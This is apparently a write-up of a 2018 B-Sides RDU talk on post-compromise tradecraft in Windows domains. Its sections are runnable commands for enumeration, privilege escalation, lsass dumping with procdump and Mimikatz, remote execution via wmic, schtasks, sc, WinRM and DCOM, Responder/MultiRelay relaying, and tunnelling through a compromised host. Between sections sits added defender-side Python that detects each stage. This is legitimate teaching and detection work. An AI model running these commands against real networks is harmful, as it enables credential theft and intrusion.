SleepZ3R0 and HA12TL3Y step forward to share some knowledge regarding what to do after an initial compromise. Initial access is typically obtained through phishing or physical attacks, such as a USB Rubber Ducky, which masquerades as a keyboard with payloads that are auto-typed on device connection. Initial recon once on a compromised system, lateral movement, port forwarding, tradecraft evasion, and tools in use at the time of the talk are discussed.

Initial Recon

The commands below are intended to answer questions such as: who am I on this network, where am I on this network, can I move to another system with my current permissions, and can I get SYSTEM on the system I have already compromised.

Group and User Enumeration

net user                                  #local user accounts
net user /domain                          #all domain accounts
net group "Domain Admins" /domain         #all domain admins in the domain
net group /domain                         #all groups in the domain
net localgroup /domain                    #local group membership on the domain controller

System Information

hostname                                  #system name
ipconfig /all                             #network interface configuration
whoami /all                               #user context: SID, group memberships, and privileges
net start                                 #started services
netsh firewall show state                 #firewall state
netsh firewall show config                #firewall config
route print                               #routing table
netstat -ano                              #TCP and UDP connections, each with its owning PID
wmic qfe                                  #installed patches (hotfixes)
tasklist /svc                             #running processes and the services hosted in each
set                                       #environment variables (user, domain, path, logon server)
echo %logonserver%                        #echo the domain controller that handled this logon
echo %username%                           #echo current user context
arp -a                                    #address resolution protocol table (layer 2 neighbours)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"    #operating system info
driverquery                               #list loaded drivers
schtasks /query /fo LIST /v               #list all scheduled tasks and their config
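The same list reads as a detection opportunity: a single user running several of these commands in quick succession is a strong host-level signal. The following is an added defender-side example, not code from the talk or the page, that classifies process-creation command lines (the shape of Windows event 4688 or Sysmon event 1, here constructed inline) into the question each command answers and alerts when one user on one host covers three or more of those questions inside a five-minute window. The category names, thresholds and sample records are assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the cheat sheet, grouped by the question they answer.
# Each regex is matched case-insensitively against a normalised command line
# (path and .exe stripped from the first token).
DISCOVERY_PATTERNS = {
    "account_enum": r"^net1?\s+(user|group|localgroup)\b",
    "host_info":    r"^(hostname|systeminfo|whoami|set|echo\s+%)\b",
    "network_info": r"^(ipconfig|route\s+print|netstat|arp\s+-a)\b",
    "firewall":     r"^netsh\s+firewall\s+show\b",
    "patch_level":  r"^wmic\s+qfe\b",
    "process_svc":  r"^(tasklist|net1?\s+start|driverquery)\b",
    "sched_tasks":  r"^schtasks\s+/query\b",
}


def normalize(cmd: str) -> str:
    """Drop the path and .exe from the program name: '"C:\\Windows\\system32\\net1" user' -> 'net1 user'."""
    parts = cmd.strip().split()
    if not parts:
        return ""
    exe = parts[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    return " ".join([exe] + parts[1:])


def classify(cmd: str):
    """Return the discovery category of a command line, or None if it is not a discovery command."""
    normalised = normalize(cmd)
    for category, pattern in DISCOVERY_PATTERNS.items():
        if re.match(pattern, normalised, re.IGNORECASE):
            return category
    return None


def find_discovery_bursts(events, window=timedelta(minutes=5), min_categories=3):
    """Alert when one (host, user) covers >= min_categories distinct discovery categories within `window`."""
    by_actor = defaultdict(list)
    for event in events:
        category = classify(event["cmd"])
        if category:
            by_actor[(event["host"], event["user"])].append((event["ts"], category, event["cmd"]))

    alerts = []
    for (host, user), hits in by_actor.items():
        hits.sort()
        i = 0
        while i < len(hits):
            j = i                                   # grow the window from hit i as far as it reaches
            while j + 1 < len(hits) and hits[j + 1][0] - hits[i][0] <= window:
                j += 1
            categories = {category for _, category, _ in hits[i:j + 1]}
            if len(categories) >= min_categories:
                alerts.append({
                    "host": host, "user": user,
                    "start": hits[i][0], "end": hits[j][0],
                    "categories": sorted(categories),
                    "commands": [cmd for _, _, cmd in hits[i:j + 1]],
                })
                i = j + 1                           # do not re-alert on the same run
            else:
                i += 1
    return alerts


# Constructed process-creation records (timestamp, host, user, command line); not real telemetry.
T0 = datetime(2018, 10, 19, 10, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0,                         "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"hostname"},
    {"ts": T0 + timedelta(seconds=5),  "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"whoami /all"},
    {"ts": T0 + timedelta(seconds=9),  "host": "WS01", "user": "CORP\\jdoe",  "cmd": r'"C:\Windows\system32\net1" user /domain'},
    {"ts": T0 + timedelta(seconds=30), "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"ipconfig /all"},
    {"ts": T0 + timedelta(seconds=60), "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"netsh firewall show state"},
    {"ts": T0 + timedelta(seconds=80), "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"wmic qfe"},
    {"ts": T0 + timedelta(seconds=90), "host": "WS01", "user": "CORP\\jdoe",  "cmd": r"notepad.exe report.txt"},
    # an administrator running one network check and, hours later, one account check: no burst
    {"ts": T0 - timedelta(hours=1),    "host": "WS02", "user": "CORP\\admin", "cmd": r"ipconfig /all"},
    {"ts": T0 + timedelta(hours=4),    "host": "WS02", "user": "CORP\\admin", "cmd": r"net user"},
]

if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']}: {len(alert['commands'])} discovery commands "
              f"covering {alert['categories']} between {alert['start']:%H:%M:%S} and {alert['end']:%H:%M:%S}")
```

The category threshold rather than a raw command count is what keeps an administrator's occasional `ipconfig` out of the alert queue while still catching the "who, where, and can I move" sequence the talk describes.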

Privilege Escalation

Commands in this section help with escalating from a lower-privileged user on a system to a higher-privileged user on the same system. While some of the commodity tools listed are detected by anti-virus, the scripts themselves still serve as a guide for performing the same checks manually, or for finding a port of the script written in a language that anti-virus does not yet detect.

PowerSploit's PowerUp

A PowerShell script, with C# ports available, that automates common Windows privilege escalation checks.

Import-Module .\PowerUp.ps1               #load the PowerUp.ps1 script; see https://github.com/GhostPack for the C# ports
Invoke-AllChecks                          #run every PowerUp check and report candidate escalation paths

Mimikatz Extraction with SysInternals

procdump.exe -ma lsass.exe minidump       #dump lsass with SysInternals procdump to minidump.dmp
mimikatz.exe                              #on your local host, for offline analysis of the dump
sekurlsa::minidump minidump.dmp           #point mimikatz at the minidump copied from the other host
sekurlsa::logonpasswords                  #retrieve passwords from the memory image

BloodHound

Invoke-BloodHound -CollectionMethod All   #collect sessions, group memberships, ACLs, and trusts for graphing in BloodHound
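The procdump step above leaves a clean trace: any process that opens a handle to lsass.exe with read access is recorded by Sysmon as Event ID 10 (ProcessAccess). The block below is an added defender-side example, not code from the talk or the page. It parses Sysmon event XML (constructed inline, trimmed to the fields used), checks the GrantedAccess mask for PROCESS_VM_READ (0x0010, the right any memory dump needs), and reports sources that are not on an allow-list of security products. The allow-list paths, computer name and sample events are assumptions for the demonstration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Process access rights from winnt.h that matter here.
PROCESS_VM_READ = 0x0010                 # required to read another process's memory (any dump needs this)
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # enough for Task Manager style queries; no memory read

# Assumed allow-list of tools that legitimately read lsass; tune to the environment.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten a Sysmon <Event> into a dict: EventID, Computer, plus every <Data Name=...> field."""
    root = ET.fromstring(xml_text)
    event = {
        "event_id": int(root.findtext("e:System/e:EventID", namespaces=NS)),
        "computer": root.findtext("e:System/e:Computer", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def is_suspicious_lsass_access(event: dict, allowed=ALLOWED_SOURCES) -> bool:
    """True for Event ID 10 where a non-allow-listed process got memory-read access to lsass.exe."""
    if event.get("event_id") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)   # Sysmon logs the mask as hex text, e.g. 0x1FFFFF
    if not granted & PROCESS_VM_READ:
        return False                                      # query-only handles cannot read credential material
    return event.get("SourceImage", "").lower() not in allowed


def scan(xml_events, allowed=ALLOWED_SOURCES):
    """Run the check over a batch of raw Sysmon XML records and return the hits."""
    hits = []
    for xml_text in xml_events:
        event = parse_sysmon_event(xml_text)
        if is_suspicious_lsass_access(event, allowed):
            hits.append({"computer": event["computer"], "source": event["SourceImage"],
                         "target": event["TargetImage"], "granted": event["GrantedAccess"]})
    return hits


def _event(source: str, target: str, granted: str) -> str:
    """Constructed Sysmon Event ID 10 record, reduced to the fields this check reads."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>10</EventID><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SourceImage">{source}</Data>
    <Data Name="TargetImage">{target}</Data>
    <Data Name="GrantedAccess">{granted}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event(r"C:\Tools\procdump.exe", r"C:\Windows\system32\lsass.exe", "0x1FFFFF"),          # full access: alert
    _event(r"C:\Program Files\Windows Defender\MsMpEng.exe", r"C:\Windows\system32\lsass.exe", "0x1010"),  # allow-listed
    _event(r"C:\Windows\system32\Taskmgr.exe", r"C:\Windows\system32\lsass.exe", "0x1000"),  # query-only: ignore
    _event(r"C:\Tools\procdump.exe", r"C:\Windows\explorer.exe", "0x1FFFFF"),                # not lsass: ignore
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['computer']}: {hit['source']} opened {hit['target']} with {hit['granted']}")
```

Keying on the access mask rather than on the tool name is deliberate: renaming procdump.exe changes nothing about the handle it has to request.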

Lateral Movement through Remote Code Execution

WMIC to Run a Local Command

wmic /node:$target process call create "C:\windows\temp\file.exe"

Create, Run, and Delete a Scheduled Task

schtasks /create /tn IE_Update /tr c:\file.exe /sc once /st 00:00 /s $target /RU system
schtasks /run /tn IE_Update /s $target
schtasks /F /delete /tn IE_Update /s $target

Create, Start, and Delete a Service

sc \\$target create $name binpath= "C:\windows\temp\file.exe"       #sc requires the space after binpath=
sc \\$target start $name
sc \\$target delete $name

Metasploit

msfconsole
use exploit/windows/smb/psexec_psh

WinRM over TCP/5985 or TCP/5986

Invoke-Command -ComputerName $target -ScriptBlock { commands }
winrs -r:http://$target/wsman "$command"

Create a Registry Run Key and Use It

REG ADD "\\$target\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v wolf /t REG_SZ /d "C:\windows\temp\file.exe"
shutdown /m \\$target -r -f -t 0          #reboot the target so the Run key fires at the next logon

DCOM

dcomexec.py $domain/$user:$password@$target $command
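Every remote execution primitive above names its target on the command line (`/node:`, `/s`, `\\host`, `-ComputerName`, `-r:`), which makes the fan-out from one workstation to many servers visible in process-creation logs. The block below is an added defender-side example, not code from the talk or the page: it extracts the remote host from each primitive and alerts when one user on one host touches two or more distinct targets. The technique labels, threshold and constructed command lines are assumptions for the demonstration.

```python
import re
from collections import defaultdict

# (technique label, regex capturing the remote host) for the primitives in the cheat sheet.
REMOTE_PATTERNS = [
    ("wmic_process_call",   r'^wmic\b.*?/node:"?([^\s"]+)'),
    ("schtasks_remote",     r'^schtasks\b.*?\s/s\s+"?([^\s"]+)'),
    ("sc_remote",           r'^sc\s+\\\\([^\s\\]+)'),
    ("reg_remote_run_key",  r'^reg\s+add\s+"?\\\\([^\\\s"]+)\\.*currentversion\\run'),
    ("shutdown_remote",     r'^shutdown\b.*?/m\s+\\\\([^\s\\]+)'),
    ("winrs",               r'^winrs\b.*?-r:(?:https?://)?([^/\s:]+)'),
    ("powershell_remoting", r'-computername\s+"?([^\s",]+)'),
]


def normalize(cmd: str) -> str:
    """Strip path and .exe from the program name so patterns can anchor on 'sc', 'reg', 'wmic', ..."""
    parts = cmd.strip().split()
    if not parts:
        return ""
    exe = parts[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    return " ".join([exe] + parts[1:])


def extract_remote_target(cmd: str):
    """Return (technique, TARGET) if the command line addresses another host, else None."""
    normalised = normalize(cmd)
    for technique, pattern in REMOTE_PATTERNS:
        match = re.search(pattern, normalised, re.IGNORECASE)
        if match:
            return technique, match.group(1).upper()
    return None


def find_fan_out(events, min_targets=2):
    """Alert when one (host, user) addresses >= min_targets distinct remote hosts."""
    per_actor = defaultdict(lambda: defaultdict(set))   # (host, user) -> target -> {techniques}
    for event in events:
        hit = extract_remote_target(event["cmd"])
        if hit:
            technique, target = hit
            per_actor[(event["host"], event["user"])][target].add(technique)

    alerts = []
    for (host, user), targets in per_actor.items():
        if len(targets) >= min_targets:
            alerts.append({
                "host": host, "user": user,
                "targets": sorted(targets),
                "techniques": sorted({t for techs in targets.values() for t in techs}),
            })
    return alerts


# Constructed process-creation records; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'wmic /node:SRV01 process call create "C:\windows\temp\file.exe"'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'schtasks /create /tn IE_Update /tr c:\file.exe /sc once /st 00:00 /s SRV02 /RU system'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'schtasks /run /tn IE_Update /s SRV02'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'sc \\SRV03 create updsvc binpath= "C:\windows\temp\file.exe"'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'reg add "\\SRV04\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v wolf /t REG_SZ /d "C:\windows\temp\file.exe"'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'shutdown /m \\SRV04 -r -f -t 0'},
    {"host": "WS01", "user": "CORP\\jdoe",  "cmd": r'schtasks /query /fo LIST /v'},            # local only
    # an administrator managing a single server over WinRM: one distinct target, no alert
    {"host": "WS02", "user": "CORP\\admin", "cmd": r'powershell -NoProfile -Command "Invoke-Command -ComputerName SRV01 -ScriptBlock { Get-Service }"'},
    {"host": "WS02", "user": "CORP\\admin", "cmd": r'winrs -r:http://SRV01/wsman ipconfig'},
]

if __name__ == "__main__":
    for alert in find_fan_out(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']} reached {alert['targets']} via {alert['techniques']}")
```

Counting distinct targets rather than commands is what separates an administrator working on one server all afternoon from an operator hopping across the estate.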
Responder and Inveigh LLMNR / NBNS / WPAD Shenanigans

./Responder.py -I eth0 -Ffwbrd            #run Responder
python RunFinger.py -i $targets           #enumerate domain, OS, and SMB signing status

Responder with MultiRelay

vi Responder.conf                         #turn off HTTP and SMB in Responder.conf to use MultiRelay
python MultiRelay.py -t $targets -u ALL   #relay to the targets returned by RunFinger.py and target all users
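Responder works because Windows hosts will ask the local segment, over LLMNR multicast, to resolve any name DNS does not know, and will trust whoever answers. The mitigation is to disable LLMNR and NBT-NS by policy and to require SMB signing so relayed authentications are rejected; the detection is a canary: query for a random name nothing owns and treat any answer as a poisoner to investigate. The block below is an added defender-side example, not code from the talk or the page: it builds the LLMNR query (RFC 4795 reuses the DNS message format), parses an answer including the compression-pointer form of the answer name, and includes a network probe that is only run when the file is executed directly. The canary name prefix and the constructed reply used for the offline self-check are assumptions.

```python
import ipaddress
import os
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # link-local multicast group that LLMNR queries are sent to
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: a length byte before each dot-separated label, terminated by 0."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def build_query(name: str, txid: int) -> bytes:
    """LLMNR query: DNS header with flags 0, one question of type A, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def read_name(buf: bytes, off: int):
    """Decode a possibly compressed name at buf[off]; returns (name, offset just past the name)."""
    labels = []
    while True:
        length = buf[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                          # compression pointer to an earlier name
            pointer = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            tail, _ = read_name(buf, pointer)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(buf[off + 1:off + 1 + length].decode("ascii", "replace"))
        off += 1 + length


def parse_response(buf: bytes, expected_txid: int, expected_name: str):
    """IPv4 addresses asserted for our canary name, or None if buf is not a matching response."""
    if len(buf) < 12:
        return None
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", buf[:12])
    if txid != expected_txid or not flags & 0x8000:      # wrong transaction, or the QR bit is clear
        return None
    off, qname = 12, None
    for _ in range(qdcount):
        qname, off = read_name(buf, off)
        off += 4                                         # skip QTYPE and QCLASS
    if qname is None or qname.lower() != expected_name.lower():
        return None
    addrs = []
    for _ in range(ancount):
        _, off = read_name(buf, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", buf[off:off + 10])   # TYPE, CLASS, TTL, RDLENGTH
        off += 10
        rdata, off = buf[off:off + rdlen], off + rdlen
        if rtype == 1 and rdlen == 4:
            addrs.append(str(ipaddress.IPv4Address(rdata)))
    return addrs


def constructed_poisoned_reply(txid: int, name: str, answer_ip: str) -> bytes:
    """Offline test vector only: the shape of a positive answer for a name nothing legitimately owns."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 30, 4) + ipaddress.IPv4Address(answer_ip).packed
    return header + question + answer


def probe(timeout: float = 2.0):
    """Send one query for a random name nobody owns; every answer identifies a host to investigate."""
    name = "canary-" + os.urandom(3).hex()
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(512)
            addrs = parse_response(data, txid, name)
            if addrs:
                hits.append((src, addrs))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for src, addrs in probe():
        print(f"LLMNR answer for a name nobody owns from {src}: {addrs} - investigate this host")
```

A segment where LLMNR has been disabled by policy should produce no answers at all; one that still answers random names is exactly the segment where RunFinger's SMB signing column matters most.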

Port Forwarding Techniques

SSH

ssh -L 8080:$internal_target:80 user@$compromised_machine     #local port 8080 forwards through the compromised machine to port 80 on the internal target

Meterpreter

portfwd add -l $local_port -r $remote_target -p $remote_port

plink

plink.exe $compromised_machine -P 22 -C -L 127.0.0.1:$local_port:$internal_target:3389 -l $username -pw $password

Proxychains

proxychains nmap -p 22,445,3389 -Pn $internal_network         #edit proxychains.conf to point towards the SOCKS server on the compromised host


Reference Index
Estimated date of talk: B-Sides RDU 2018
Slides: Live BSides RDU Video
Title: Movement After Initial Compromise
Speakers: SleepZ3R0 and HA12TL3Y